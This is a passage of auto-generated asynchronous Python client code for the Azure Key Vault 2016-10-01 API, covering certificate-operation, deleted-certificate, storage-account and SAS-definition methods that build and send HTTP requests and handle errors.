:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
async def delete_certificate_operation(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateOperation":
"""Deletes the creation operation for a specific certificate.
Deletes the creation operation for a specified certificate that is in the process of being
created. The certificate is no longer created. This operation requires the certificates/update
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateOperation, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateOperation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_certificate_operation.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_certificate_operation.metadata = {'url': '/certificates/{certificate-name}/pending'} # type: ignore
async def merge_certificate(
self,
vault_base_url: str,
certificate_name: str,
parameters: "_models.CertificateMergeParameters",
**kwargs: Any
) -> "_models.CertificateBundle":
"""Merges a certificate or a certificate chain with a key pair existing on the server.
The MergeCertificate operation performs the merging of a certificate or certificate chain with
a key pair currently available in the service. This operation requires the certificates/create
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:param parameters: The parameters to merge certificate.
:type parameters: ~azure.keyvault.v2016_10_01.models.CertificateMergeParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.merge_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CertificateMergeParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
merge_certificate.metadata = {'url': '/certificates/{certificate-name}/pending/merge'} # type: ignore
def get_deleted_certificates(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedCertificateListResult"]:
"""Lists the deleted certificates in the specified vault currently available for recovery.
The GetDeletedCertificates operation retrieves the certificates in the current vault which are
in a deleted state and ready for recovery or purging. This operation includes deletion-specific
information. This operation requires the certificates/get/list permission. This operation can
only be enabled on soft-delete enabled vaults.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedCertificateListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedCertificateListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_certificates.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedCertificateListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_certificates.metadata = {'url': '/deletedcertificates'} # type: ignore
async def get_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.DeletedCertificateBundle":
"""Retrieves information about the specified deleted certificate.
The GetDeletedCertificate operation retrieves the deleted certificate information plus its
attributes, such as retention interval, scheduled permanent deletion and the current deletion
recovery level. This operation requires the certificates/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedCertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedCertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedCertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedCertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}'} # type: ignore
async def purge_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified deleted certificate.
The PurgeDeletedCertificate operation performs an irreversible deletion of the specified
certificate, without possibility for recovery. The operation is not available if the recovery
level does not specify 'Purgeable'. This operation requires the certificate/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}'} # type: ignore
async def recover_deleted_certificate(
self,
vault_base_url: str,
certificate_name: str,
**kwargs: Any
) -> "_models.CertificateBundle":
"""Recovers the deleted certificate back to its current version under /certificates.
The RecoverDeletedCertificate operation performs the reversal of the Delete operation. The
operation is applicable in vaults enabled for soft-delete, and must be issued during the
retention interval (available in the deleted certificate's attributes). This operation requires
the certificates/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param certificate_name: The name of the deleted certificate.
:type certificate_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CertificateBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.CertificateBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CertificateBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'certificate-name': self._serialize.url("certificate_name", certificate_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('CertificateBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}/recover'} # type: ignore
def get_storage_accounts(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.StorageListResult"]:
"""List storage accounts managed by the specified key vault. This operation requires the
storage/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.StorageListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_storage_accounts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_storage_accounts.metadata = {'url': '/storage'} # type: ignore
async def delete_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
**kwargs: Any
) -> "_models.StorageBundle":
"""Deletes a storage account. This operation requires the storage/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def get_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
**kwargs: Any
) -> "_models.StorageBundle":
"""Gets information about a specified storage account. This operation requires the storage/get
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def set_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Creates or updates a new storage account. This operation requires the storage/set permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to create a storage account.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def update_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountUpdateParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Updates the specified attributes associated with the given storage account. This operation
requires the storage/set/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to update a storage account.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def regenerate_storage_account_key(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountRegenerteKeyParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Regenerates the specified key value for the given storage account. This operation requires the
storage/regeneratekey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to regenerate storage account key.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountRegenerteKeyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.regenerate_storage_account_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountRegenerteKeyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_storage_account_key.metadata = {'url': '/storage/{storage-account-name}/regeneratekey'} # type: ignore
def get_sas_definitions(
self,
vault_base_url: str,
storage_account_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SasDefinitionListResult"]:
"""List storage SAS definitions for the given storage account. This operation requires the
storage/listsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SasDefinitionListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SasDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_sas_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SasDefinitionListResult', pipeline_response)
